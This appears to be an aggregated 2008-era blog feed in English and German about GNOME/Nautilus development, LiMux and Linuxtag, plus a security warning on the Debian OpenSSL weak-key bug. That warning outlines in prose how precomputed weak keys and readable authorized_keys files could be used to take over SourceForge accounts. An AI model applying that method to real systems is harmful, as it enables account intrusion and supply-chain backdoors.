The 2 hour flight wasn’t too stressful but my sister is moving to New Zealand which will be a little more difficult to visit.

Echt lieb, wie sich die Firma Frosta um ihre Kunden kümmert *g*

I’m currently on holiday in North Berwick. It’s been fun but not quite as relaxing as hoped. Liam has started waking at night again after two months of sleeping through the night.

I’ve been getting up early to do a couple of hours work each morning, but this laptop’s hard drive has started hard crashing after a few minutes. Hard drives fail too often. Hopefully it will give me time to finish this blog entry and hit Publish. I guess I’ll be offline until I get back on Monday.

After my recent blog entry about Nautilus tab support, Jared Moore raised his hand, started a private bzr branch and hacked away. This is great news, because it shows that we have so much contribution potential. For instance, Paweł Paprota is about to receive an SVN account.

A main focus of us (the “established” developers and maintainers) is to ensure that all you programming contributors out there receive optimal assistance and mentoring. Of course, this also applies to users, translators, artwork contributors, and journalists!

Because my last blog entry was a success, let’s try it again:

We are looking for someone who wants to improve the GTK+ tree view selection interaction: At the moment there is no way to pop up a context menu or drag a selection rectangle in a crowded list of files in the Nautilus list view.

The six years old bug report is available here, an email explaining the current issue is available on the mailing list archives of gtk-devel-list.

Heute habe ich erfahren, dass es zuletzt arge Probleme bei unserem langjährigen Hostingpartner gab und zu allem Überfluss letzte Woche noch technische Defekte auftraten. Die Server sind deshalb down.

Nunja, ich bin dabei die Backups zu sichten und werde im Laufe der Woche die Domain wieder online stellen.

Ist also keine böse Absicht

So, erstmals seit einer Woche wieder ausgeschlafen. Wurde auch Zeit.

Irgendwie bin ich total hin und hergerissen, was ich schreiben möchte.

Der gemeinsame Stand “LiMux und Auswärtiges Amt” war eine tolle Sache, wir konnten uns bei Besuchergesprächen wunderbar ergänzen und gleichzeitig noch die persönlichen Kontakte untereinander aufbauen. Die Idee ist voll aufgegangen und wird sicherlich bei Gelegenheit wiederholt.

Gleichzeitig habe ich deutlich gemerkt, dass die Messe Berlin und der Linuxtag sich bemüht haben und viele der Kinderschuhprobleme vom letzten Jahr nicht mehr auftraten. Die Einrichtung der freien Stände war imho wesentlich geeigneter und die Infrastruktur außenrum (z.B. günstiges Essen in der Betriebskantine der Messe) war wesentlich besser an eine Veranstaltung wie den Linuxtag angepasst, der nunmal keine echte Businessmesse ist.

Die zwei Hallen Standfläche waren OK, die drei Ebenen (Vorträge - Ausstellung - Vorträge) schon ziemlich verwirrend für den Anfang. Aber das lässt sich imho leicht durch bessere Beschilderung wettmachen.

Gar nicht zufrieden war ich mit der Organisation und dem Ablauf des erstmals angebotenen CIO Summits, der Stellenwand und mit der PR-Vermarktung. Da gibt’s wohl noch Gesprächsstoff…

Bin mal gespannt, was ich noch so als Feedback während der nächsten Tage lesen werde.

Nächstes Jahr ist der Linuxtag übrigens später, d.h. Ende Juni vom 24. bis 27. Juni 2009.

Wow. Die ersten beiden Tage war an unserem Stand, den wir gemeinsam mit dem Auswärtigen Amt betreiben, richtig was los. Bereits am Mittwoch, dem traditionell schwächsten Messetag gab’s wenig Pausen.

Und gestern dann noch unser Highlight, die Veröffentlichung des WollMux als freie Software unter der EUPL (Infos). Da ging dann nach dem Tickern gleich mal der dafür übergangsweise genutzte vServer in die Knie.

Mal schauen, was die beiden anstehenden Tage noch bringen.

Joachim drew my attention to Openstreetmap.org. So I thought I'd give it a try. Unfortunately the don't seem to have the hardware or bandwidth resources yet for everyday use.

Search results for "München":

City München [en:Munich], about 70km south of Ingolstadt

Village München, about 4km south-west of Bad Berka

Region München, about 1km north of Unterbiberg, Unterhaching

München [en:Munich], less than 1km south of München

[...]

Very funny. München (Munich) itself has 1.3 Million, Ingolstadt about 120k inhabitants. The region around München totals to about 3-5 Million inhabitants, depending on what you consider to be part of the region. But Unterbiberg (13k) and Unterhaching (22k) are officially part of the district of Munich.

The best specification however is the fourth one: If Munich is south of Munich, Munich is also north of Munich, right? So Munich is everywhere, right?

Other search highlights include a Footway "train platform direction Munich".

Nevertheless, the search results make sense, the first result is what I had in mind, and I really like the references they give for each search result.

I wonder if when you type in "San Francisco" it will be like "San Francisco, north of South San Francsico" (no, it's "north of Daly City")

When people think of computer scientists, they think of someone with bad health, a bad skin color and no fitness at all. While there probably are some like that, I actually don't know many. Instead I know people who do things like fighting with sword and rapier. My main sports is advanced lindy hop dancing (which does include occasional aerials and such, but mostly involves 'jumping' around at high speeds). I like dancing most because of the social aspects of it.

Myselfi, I can claim to be the very opposite: I just came back from 5 hours of sports, and I'm not even exhausted, just very hungry. The 5 hours include riding about 13 km in half an hour through the city (and we're suffering from a heat wave these days, with winds from the sahara desert reaching germany), then two full training sessions (that really used to stress me when I started), then the ride back of 13 km again.

My body mass index is 18.something, so I'm slightly underweight, but I actually eat a lot - but I also eat healthy and diverse. Most of my food I cook myself, so I know it's fresh and where I got it from. I'm not vegetarian, I do eat meat about two times a week. I also try to have some variety there, pork, beef, lamb, deer, chicken, ... I don't drink much alcohol and I do not smoke.

So don't stick to that prejudice that computer science people or geeks are physically in a bad shape. You can be both a geek, soical and athletic. The people I know how are in really bad shape actually watch too much TV and such, they neither engage their body nor their mind, nor leave their house much to meet other people.

This is a message to all the people who want to get involved with GNOME/Nautilus development, and do something useful!

As of writing, I am the only active Nautilus maintainer, and I am totally running out of time due to my studies. I’ll have a high frequency engineering exam on Wednesday, and it’s getting worse due to various time-consuming activities in my spare time.

Therefore, I am looking for an interested hacker who wants to finish my work on Nautilus user interface tab support (”multiview” branch). You should make sure that all the keybindings and mouse interaction patterns are consistent with Epiphany, and that the overall user experience is flawless.

You should have good communication skills since you would work with the usability team on a GNOME-wide policy for tabbed applications (i.e. keyboard and mouse interaction), and make sure that Epiphany, Nautilus, gedit and gnome-terminal behave accordingly.

Do some hacking for hugs and fame!

Update: Jareed Moore volunteered, and already published an analysis of the keybindings and mouse interaction shortcomings. Feel free to add any issues you find.

Kommenden Mittwoch startet

die 14. Auflage Europas führender Veranstaltung zu Linux und Open Source auf dem Berliner Messegelände unter dem Funkturm (www.linuxtag.org).

Wir Münchner nutzen die Gelegenheit und präsentieren uns auf einem Gemeinschaftsstand zusammen mit dem Auswärtigen Amt in Halle 7.2b, Stand 209. Zwei Behörden, die in vergleichbarer Größe auf offene Standards und freie Software umstellen (München: 14.000 PCs in unzähligen Standorten verteilt innerhalb der Stadt, das Auswärtige Amt 11.000 PCs in allen deutschen Botschaften weltweit). Wir beide können sicherlich anderen Interessenten eine Menge aus der Praxis zeigen, Vorurteile beseitigen und Ängste nehmen. Die Message soll sein “freie Software ist in der Verwaltung schon längst angekommen”.

LiMux ist zusätzlich noch mit zwei Vorträgen am Donnerstag (29.5.) vertreten:

• 12 Uhr, Behördenkongress “München arbeitet erfolgreich mit freier Software” (von Karl-Heinz Schneider, unserem neuen IT-Leiter und mir)
• 15 Uhr, OpenOffice.org Track “In München behält der WollMux die OpenOffice.org Vorlagen im Griff” (von Christoph Lutz, unserem Verantwortlichen für OpenOffice.org/WollMux)

Zudem halten wir am Donnerstag noch eine kleine Überraschung bzgl. unseres WollMux bereit

Ich bin gespannt, wie die zweite Auflage des Linuxtages in der Bundeshauptstadt wird.

Wow, ich hätte nicht gedacht, dass es doch noch jemand wagt:

http://www.openmalaysiablog.com/2008/05/the-south-afric.html

Schauen wir mal, ob es noch mehrere wagen und v.a., was dabei herauskommt.

Ich kann das nur begrüßen, denn abseits der ganzen Lobbydiskussion hat sich jetzt ja bewahrheitet, dass nichtmal Microsoft das eigene Format OOXML in den nächsten Jahren unterstützen kann - hat M$ gemerkt, dass OOXML unimplementierbar ist?

Demnächst werden wir unseren WollMux der Öffentlichkeit vorstellen und als erste Software aus dem Projekt LiMux unter einer freien Software Lizenz veröffentlichen, wie die IDABC schon richtig berichtet. Die Wahl fiel auf die European Union Public License (EUPL), da wir hier eine auf das Recht der EU-Mitgliedsstaaten angepasste Lizenz nutzen können, die weniger Grauzonen als die GPL bietet. Die Rechtssicherheit erhöht sich für uns dadurch und wenn das ein Grund für Juristen ist, diese Entscheidung zu beschleunigen, dann nutzen wir den auch gerne

Mal schauen, was die kommende Woche so alles bringt…

Auf den ersten Blick klingt die Ankündigung Microsofts vielversprechend, ab dem nächsten Servicepack für Microsoft Office auch den bisher einzig real exisitierenden Standard zum Dokumentenaustausch zu implementieren, das Open Document Format (ODF).

Anscheinend hat der in den letzten Monaten erzeugte Druck die avisierte Wirkung nicht verfehlt und den Monopolisten dazu gebracht, den bisherigen halbherzigen Ankündigungen nun eine weitere folgen zu lassen. Zunächst denke ich, sollte man M$ den Grundsatz “in dubio pro reo” zugestehen, d.h. wir sollten diesen Schritt begrüßen und auf die Lösung der seit der umstrittenen ISO-Standardisierung von OOXML aufgeworfenen Fragen hoffen. Gleichwohl bin ich zu sehr gebranntes Kind und glaube M$s Ankündigungen erst, wenn ich sie tatsächlich sehe.

Von daher: Lasst uns hoffen, dass im nächsten M$ Office Servicepack der ODF Standard zu 100% unterstützt wird und damit der Austausch beider Standards ohne jegliche Verluste fehlerfrei gestaltet werden kann.

Auf Einladung des Kantons Genf durfte ich gestern auf dem schweizer Linuxtag über LiMux berichten - auf englisch, mein Französisch ist dann doch zu eingerostet.

Interessant war für mich vor allem die Diskussion mit den dortigen IT-Verantwortlichen vor und nach meinem Vortrag. In Genf tut sich einiges, neben dem mittlerweile bekannten Projekt alle 9.000 Schul-PCs auf freier Software umzustellen werden parallel dazu verschiedene Alternativen für die Verwaltungsrechner getestet.

Während in den Nierlanden, wo ich vergangene Woche war, überwiegend an der landesweiten Strategie gearbeitet wird und eine Vielzahl von Austauschmöglichkeiten geschaffen werden (Netzwerkbildung), ist die Schweiz, v.a. die französischsprachige, da eher auf sich alleine gestellt. Es gibt ja einige Protagonisten (Solothurn, Thurgau, …), jedoch überwiegend im deutschsprachigen Teil. Ähnlich wie in Deutschland die starken Bundesländer haben die Kantone ebenfalls eine Reihe von eigenen Rechten und in IT Fragen ist die Bundesregierung eher zurückhaltend. Das hat in der Schweiz die angenehme Folge, dass im kleinen Rahmen einfach gemacht wird, ohne dass es großartige Policies dazu gibt.

So eben auch in Genf, ich bin gespannt, was dort die nächsten Jahre noch passiert.

We got lucky again. Jan Arne Petersen will start as a full-time Openismus employee next week, bringing more GTK+/GNOME development skills. He’ll be doing some interesting work on the Maemo platform.

Since development kernels 2.6.26-rc*, the iwlwifi drivers (iwl3945, iwl4965) have LED support. While LED support is nice to have (making it easy to see when the wireless connection is available), the blinking of the LED whenever there is data transmitted is annoying.

In most networks, there is a constant chatter on the net. Windows server browsing and announcing, Zeroconf/Bonjour announcements, Printer discovery. When you're using some instant messaging or chat such as IRC there is some data transmitted all the time. Your email program might be polling for new emails, and your weather applet might be fecthing the latest forecasts. So basically, there always is ome network traffic. Often in the range of less than 1k/s, but there is.

The new iwlwifi drivers don't flicker the LED with each packet received, but apparently will just set the LED to a blink mode when they received or transmitted some data, which if find rather irritating.

Fortunately, this can easily be configured in Linux, just save this script in /etc/network/if-up.d/iwl-no-blink and make it executable:

#!/bin/sh
if [ "$IFACE" = "wlan0" ]; then
	for dir in /sys/class/leds/iwl-phy*X; do
		echo none > $dir/trigger
	done
fi

This is a quick hack, but it does the job well for me - when the device is connected it will stop blinking on data. It will still blink when connecting (leds:iwl-phy*:assoc) and indicate if the connection is available (leds:iwl-phy*:radio).

I’ve been travelling more than usual in May and I’m not finished.

I spent a couple of days in Brussels at Thomas Vander Stichele’s place, getting a crash course in the Flumotion streaming media server because I’ll be writing Flumotion’s user documentation.

I’m writing quite a lot of documentation these days, and enjoying it as a holiday from writing code. It’s stress free in comparison. I’d like to make Openismus known for creating documentation along with our development and QA work. There’s always a need for it.

After Brussels I spent a few days with Liam’s grandparents in Karlsruhe before heading to Prague for FOSSCamp. Being away from him for so long was not easy.

Things I read on the train to Prague:

• The GStreamer Application Development Manual: This is a truly useful document. I now feel like I understand how to use gstreamer. That has allowed me to make sense of the surprisingly mature gstreamer C++ bindings and should help my understanding of Flumotion. I now want to read the GStreamer Plugin Writer’s Guide too.
• The GNOME Documentation Style Guide: This was better than expected, written by true strunkandwhiteistas who show real experience of writing technical documentation. I didn’t learn much new but was glad to see the advice presented for others. Many points are repeated, but that’s maybe to allow each audience to get the whole message without reading the other sections. Still, the text is sometimes long winded, suggesting a rogue extra author.

FOSSCamp was not quite the dull unstructured talk-fest that I feared, just because of the quality of the attendees, each of whom had something fascinating to explain. It was indeed mostly just talk, with little chance of any resulting action, but it was at least interesting talk.

I quickly introduced Glom to a small group of people who seemed positive and led a larger discussion about updates of stable upstream releases in stable versions of distros, mostly focusing on Ubuntu because only the Ubuntu people seemed to have opinions. Maybe the other distros’ processes are not so easily influenced. I think we already have a result, which I can hopefully mention soon.

I stayed an extra day to meet André Klapper, who is attending the Ubuntu Developer Summit, so we could talk about his bugmaster work for Openismus. We fight entropy. I attended the Ubuntu Mobile sessions in the morning before taking the train home to Munich, but it was impenetrable to anyone not already involved. But that’s UDS - it’s for people already working on stuff.

Both FOSSCamp and the overlap with UDS allowed me to meet many of my favourite people and I am guilty of enjoying their company when I should have been meeting more new people instead.

On Saturday we fly to Scotland (North Berwick) for two weeks so Liam can meet his other grandfather and aunt. I’ve tried to plan the pain out of flying with a five-month old baby for the first time, but it’s sure to be a challenge.

GNOME has reacted and removed all blacklisted SSH keys from their authorized_keys, which is the minimum you should do to ensure safety.

For all I know, sourceforge.net has not yet done so (I didn't check if I could have logged in with my old key, though - maybe they installed the blacklist in the SSH server, not touching the users' keys; there is no blacklist in /etc/ssh though). authorized_keys files are world-readable, so I can login at sourceforge and read other users' authorized_keys. With this approach I believe you could hack dozens of SSH accounts on Sourceforge within a few hours, without having to employ brute-force.

These keys could then be used in turn to inject backdoors and/or trojans into other OpenSource projects (where at least one developer with write access did use a vulnerable key).

If you were affected by the Debian OpenSSL bug, please replace your SourceForge key as soon as possible. Please verify any commits made on SourceForge until they've taken appropriate measures to block bad keys.

SourceForge and other operators of such platforms should install blacklists NOW, and remove any vulnerable keys from their databases.

Let me just point out, that the consequences affect all users of SSH. Therefore IMHO all other Linux and BSD distributions need to release a security update to OpenSSH as well, to prevent the use of insecure (too common) keys, because it threatens the security of their systems as well!

Apparently, there are only about 2^15 different keys generated by the SSH versions shipped with Debian for 2 years. It's really surprising that noone noticed this earler. This is just about 32767 different keys. (For each type, size and endianess, but that still makes this number much much much too low) The weakness is caused by a bad random number generator in the Debian package.

Hackers have already generated all these 32767 different keys, for two key lengths and types. In a few hours, they'll also have generated all the 4096 bit keys that could have been generated. Other key lengths are uncommon and sometimes might even be unsupported. Most people use keys with length 1024 or 2048.

So we now have about 32767 keys which are used by lots of Debian and Ubuntu users. That's not very much. Now you have to realize how the keys are used:

The key is used to log into a system without a password. Sometimes a key is protected with a passphrase (you really should do that), but this doesn't help here, because an unencrypted clone of the key was already generated.

Sometimes (or let me even claim 'often') one such key is also used to login as root into a server. This is equivalent to just 32767 different passwords being used as root passwords. So with about this number of tries, an attacker might be able to log into your server as 'root'!

Now the weakness is 'distributed' by the users, it's not just a server-side vulnerability. If your server is running e.g. RedHat, it doesn't mean it is secure!.

In fact, if your server is running Debian and you installed the Debian security update for openssh, it will be much more secure than the RedHat server. Because the Debian server has a blacklist of keys that are too common. The other-Linux server who doesn't have this blacklist doesn't know that a certain 'weak' key is not trustworthy.

Fixing the bad key-generation is just half of the deal. "Recalling" all the keys in use out there is the big challenge, that affects all systems using SSH (and to a different extend, SSL). The most reliable way is if all other distributions would release a security update as well, which refuses to accept the keys that were generated by vulnerable Debian systems.

Let me just repeat it in other words: Any Linux/Unix/*BSD system is vulnerable that grants access to a key that was generated on an affected Debian or Ubuntu system. (Until the system has a reliable detection method of such weak keys.) Keys are usually generated on the users workstation, so if any of your users is or was potentially running Debian or Ubuntu ... you get the idea.

Note that if you are not careful, you might lock yourself out from your server. If you don't have or remember the password, installing the security update might disable your login key. So if your key is bad, make sure to generate a new, secure key and distribute it ASAP. Also remove any vulnerable key ASAP; remember that hackers now have a list of all possible keys and could use that to brute-force login.

P.S. Since some people still don't seem to get the consequences in full: The bigger problem is to remove are the weak keys, not to fix the broken library. The weak keys (especially in the form of public keys!) can live on tons of other systems, not just on Debian and Ubuntu. This is why TOR also released a security update and e.g. CACert urges non-Debian distributors to also ship and use the blacklists of known weak keys. Also note that not all keys that can be considered compromised can be detected this easily. If you've been using a DSA key on an affected system - even when it was created on a different system - it is to be considered compromised.